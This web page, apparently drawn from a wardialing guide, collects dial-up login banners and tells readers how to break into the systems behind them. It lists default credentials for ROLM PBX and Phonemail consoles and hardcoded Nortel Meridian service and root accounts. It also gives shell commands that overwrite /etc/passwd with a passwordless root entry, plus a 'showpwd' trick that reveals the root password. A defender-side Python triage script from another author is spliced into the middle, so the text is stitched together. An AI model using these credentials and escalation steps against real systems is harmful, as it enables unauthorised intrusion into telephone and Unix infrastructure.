LHF

Low Hanging Fruit Domain (LHF):
(Excerpts from Hacking Exposed written by Stephan Barnes  "M4phr1k")

Banner contributions from the White Hat community are posted below. Keep 'em coming. The banners right below are from my own experiences.

This dial-up domain tends to be the one that takes the least amount of time, and if you are lucky, it provides instantaneous gratification. It requires no scripting, so essentially it is a guessing process. It would be impossible to list all of the common IDs and passwords used for all the dial-in capable systems. Here is one list, from http://cirt.net/passwords

Once again, experience from seeing a multitude of results from wardialing and playing with the resulting pool of potential systems will help immensely. The ability to identify the signature or screen of a type of dial-up system provides the basis for where to start with the default userids or passwords for that system. Whichever list you use or consult, the key here is to spend no more than the amount of time required to exhaust all of the possibilities for default IDs and passwords, and then, if unsuccessful, move on to the next domain.
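As an added example (my own code, not from this page or its author), here is a defender-side triage script for the wardial log format shown on this page: it splits the log at each CONNECT line, classifies the answering system from its banner, and ranks which numbers an owner should fix first (an IOS prompt left logged in ranks above a reachable login prompt, which ranks above a SecurID challenge). The signature regexes and the sample log are my own constructions approximating the banners collected on this page.

```python
import re

# Signatures approximated from banners on this page (my own regexes, not an official list).
SIGNATURES = [
    ("Cisco IOS", r"User Access Verification"),
    ("Bay Networks Annex", r"Annex Command Line Interpreter"),
    ("ROLM CBX", r"ROLM CBX"),
    ("RSA SecurID", r"Password :\s*\n\d{8} :"),
    ("pcAnywhere", r"Please press <Enter>"),
]
CONNECT_RE = re.compile(r"^(\S+ \S+) (\S+) C: CONNECT (\S+)[ \t]*$", re.M)

def parse_log(text):
    """Split a wardial log into (number, banner) pairs, one per CONNECT line."""
    hits = list(CONNECT_RE.finditer(text))
    out = []
    for i, m in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(text)
        out.append((m.group(2), text[m.end():end].strip()))
    return out

def fingerprint(banner):
    """Return the system class the banner most likely belongs to."""
    for name, pat in SIGNATURES:
        if re.search(pat, banner):
            return name
    return "Unknown login" if re.search(r"(?im)^.*(login|username):", banner) else "Unknown"

def risk(banner, system):
    # "hostname>" with no password challenge: the previous caller never logged out (the open-router case above).
    if re.search(r"(?m)^\S+>\s*$", banner) and "Password" not in banner:
        return "CRITICAL: open session, no authentication"
    if system == "RSA SecurID":
        return "LOW: token challenge in place"
    if system == "Unknown":
        return "INFO: no recognised prompt"
    return "HIGH: login prompt reachable, confirm defaults are changed"

def triage(text):
    """One (number, system, risk) tuple per answered call, for the audit report."""
    return [(n, fingerprint(b), risk(b, fingerprint(b))) for n, b in parse_log(text)]

# Constructed sample in the log format used on this page.
SAMPLE = """30-Jun-XX 13:25:45 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
User Access Verification
Password:
30-Jun-XX 13:25:55 91XXXXXXXXXY C: CONNECT 9600/ARQ/V32/LAPM
RouterB345XX>
30-Jun-XX 13:24:40 91XXXXXXXXXZ C: CONNECT 9600/ARQ/V32/LAPM
Please press <Enter>...
"""
```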

Stay tuned for a page devoted to screen prints of what the system login prompts look like.

I'm constantly updating: if you have anything, let me know.

PC ANYWHERE

(should be called PC Everywhere)

30-Jun-XX 13:24:40 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM


Please press <Enter>...

All you have to do here is have a copy of PC ANYWHERE and dial back the target and see what happens ;>

There are different modes, so if the session is encrypted it could be tougher, etc.

CISCO

30-Jun-XX 13:25:45 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM


User Access Verification
Password: 
Password: 
Password: 
% Bad passwords
+++

This is typically a Cisco. If you luck out and get in with a password, you are dropped into a prompt:

RouterA123XX>

Sometimes the person dialing into the router leaves the router in an active state because they did not log out gracefully:

30-Jun-XX 13:25:55 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM


RouterB345XX>

If this happens, do a SHOW CON or type ? and take it from there.

BAYNETWORKS

30-Jun-XX 13:26:40 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM

Bay Networks, Inc. and its Licensors.
Copyright 1992,1993,1994,1995,1996,1997,1998. All rights reserved.

Login:

01-Jul-XX 21:55:39 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM

Annex Command Line Interpreter * Copyright (C) 1988, 1998 Bay Networks
Checking authorization, Please wait...
Annex username:

01-Jul-XX 21:55:39 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM 
Annex Command Line Interpreter * Copyright (C) 1988, 1997 Bay Networks
annex:

Consult your favorite default password list

SHIVA LAN ROVERS

30-Jun-XX 16:40:13 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS

@ Userid: 
@ Userid: 
@ Userid: 
@ Userid: 
@ Userid: 
@ Userid:

Consult your favorite default password list

IBM AIX

30-Jun-XX 17:20:14 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM

AIX Version 4
(C) Copyrights by IBM and by others 1982, 1994.
login:

Try uid: oracle pwd: oracle, or no password, etc.

HP UNIX

30-Jun-XX 17:21:14 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM


GenericSysName [HP Release B.10.20] (see /etc/issue)
login:


Consult your favorite default password list

UNIX - VARIOUS

02-Jul-XX 17:28:27 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS

Welcome to SCO UNIX System V/386 Release 3.2

XXXXXX!login:

02-Jul-XX 17:29:27 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS


SCO OpenServer(TM) Release 5 (strXXXX) (tty1A)

*****************************************
****<<Wed Apr XX XX:XX:XX EDT XXXX>>*****
************<< 3.2v5.0.4 >>*************
*****************************************
(Please Use Lower Case Letters!)
login:


02-Jul-XX 17:38:16 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM

The system's name is XXXXXXXX.
Welcome to USL UNIX System V Release 4.2 Version 1
login:

02-Jul-XX 17:39:16 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM 
Welcome to UnixWare 2.01
The system's name is XXXXXX.

login:

Consult your favorite default password list

ROLM

02-Jul-XX 17:38:16 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM


ROLM CBX MODEL 10, 9030A PROCESSOR (Prom Rev 3.4) SITE ID: XXXXXXXX
RELEASE: 9005.6.84 BIND DATE: 27/January/98 12 Megabytes
(C) Copyright 1980-1998 Siemens Rolm Communications Inc. All rights reserved.
ROLM is a registered trademark of Siemens Rolm Communications Inc. 
17:38:16 ON Saturday x/xx/xxxx 25 DEGREES C


USERNAME:

PASSWORD: 
Not in directory


This is the PBX management console, gang; a few of these uid/pwd combos still work:

admin pwp

eng engineer

op op

op operator

su super

Or you might see the failure this way:

USERNAME:

PASSWORD:

INVALID USERNAME-PASSWORD PAIR.


ROLM SIEMENS PHONE MAIL

Login:

Password:

ROLM Phonemail Version 6.4

Login:
Password

ROLM Phonemail Version 6.4

(C) Copyright 1989-2000 Siemens I & C Networks, Inc. All Rights Reserved

!!!

ROLM Phonemail Site ID: xxxxxxxxxx

PhoneMail release 6.4.3

CPU Type of local node is GenuineIntel 80586 133mhz

?Phonemail is active with 16 Channels

Function:

Friday Feb 2, 2002 4:15 AM

sysadmin/sysadmin is a good place to start for the uid/pwd pair ;>

SECURE ID

Hello 
Password : 
58945664 :
Hello 
Password : 
16232368 :
Hello 
Password : 
77856559 :
Your access is denied, Good Bye.


(If you see this you might want to forget it; this is challenge-response, so it will be nearly impossible to hack an RSA SecurID token.)


BANNER (WAR DIAL and PBX) CONTRIBUTIONS SECTION

If you have any contributions feel free to send it along to 

stephandbarnes@gmail.com

If I post your banner or suggestion I certainly give credit. Check out the Hacking Meridian section and you can see. Newest data first.



From: Sacha Faust 4/11/02
sacha@severus.org

Thanks Sacha!

Stephan, From some results I found,

Welcome to USL UNIX System V Release 4.2 Version 1 == AUDIX or its link with some AUDIX system. The "System's name is" part always seems to be set to "Intuity".

Here are some additional banners I found:

1. OpenVMS VAX
Welcome to OpenVMS VAX V6.1
Username:


2. Direct Audix
System name: audix
login:

3. QNX
QNX Version 3.21 Node 0 $tty3 Local Time: XXX
Copyright (c) Quantum Software Systems Ltd. 1983,1989
Login:

4. QNX (might vary depending on OS version or config)
Copyright (c) Quantum Software Systems Ltd. 1983,1989
Login:

5. CITRIX metaframe (not 100% sure)
ICA

---------
Sacha Faust
sacha@severus.org


HACKING Meridian NEW Feb 2, 2002 for all you GroundHogs :> (this is in the Meridian Section also)

Sent in from a fellow pen tester. This stuff does work, because I've gotten in with it. There were a few techniques I was not privy to, so this was GREAT info.

Posted with Permission from Mark A. Rowe at Pentest Limited

Thanks Mark!

----------------------- Email Excerpt -----------------------------

Hi Stephan,

I've just been on your website www.m4phr1k.com which is great. While browsing I noticed that you had started a section on Meridian and thought you might be interested in an email I posted to the pen-test list a while back. At the time HD Moore asked me whether I was going to write it up or put it on a website but I forgot all about it. Anyway, if you didn't already know it and think it is useful, feel free to put it on your site when you have the time. I've never come across a system in the UK where the service account has had its password changed.

The email is below. I'll be looking at an Ericsson MD110 in the next couple of weeks, if I find anything useful I will let you know.

Regards,
Mark.

========================================================================
I came across this while doing a security review 3 years ago. I tried to contact Nortel several times but never received a response. I guess they don't think it is important :-o

If the PBX is hooked into the actual network, there are quite a few ways to get access to the system. The easiest method is to tftp the /etc/passwd file 
off the system and crack the hashes. If you go this route, you will get a user account called "service" with a password of "smile" ;) If you log into 
the system with this account, you will notice that /etc is mode 0777, so getting root access is trivial:

$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
$ mv /etc/passwd /etc/passwd.bak
$ mv /etc/mah_passwd /etc/passwd
$ su root
# mv /etc/passwd.bak /etc/passwd

I don't remember which version of this system it was, but the client software that came with it was called "Meridian Terminal Emulator". You could manage 
the PBX with this by first logging in with 0000/0000 then giving it the manager password of "9999". I really wish I had more time to write up the stuff I find out there.

HD

Anyway, I think the service account exists on the MAX, CCR and Link Meridian components.

Here is some other stuff I came across.

Accounts that give UNIX level access:

BOXAccountPasswordUse
MAX, CCR, LINKservicesmileGeneral Engineer Account
CCR, LINKdisttech4tasEngineer Account
MAXroot3ep5w2uRoot

Accounts that give application level access 

BOXAccountPasswordUse
MAXmaintntacdmaxMaintenance Account
CCR, LINKmaintmaintMaintenance Account
CCRccrusrccrusrUser Account
LINKmlusrmlusrUser Account

To gain root access on Link or CCR:

Login as disttech/4tas

type "showpwd"

at prompt enter first 3 letters from Yesterday and first 3 from Tomorrow (e.g. if today is Tuesday enter "MonWed" - note the capitalisation).

When you are told this is invalid, enter the same thing again.

The root password is now displayed in plain text on the screen. You can now "su" to root with this password.

To gain access to the Meridian itself - there are two methods of access depending on how the switch is set up. Try password only first as most will probably be set up like this -

Password only
enter
logi 0000 (customer level)
logi 1111 (a bit higher)
logi 8429 (maintenance)

Username and password
logi customer
PASS? 0000

logi admin1
PASS? 1111

logi to
PASS? 8429

Hope this helps,
Mark.

-- 
Mark Rowe
IT Security Consultant
PenTest Limited

www.pentest-limited.com
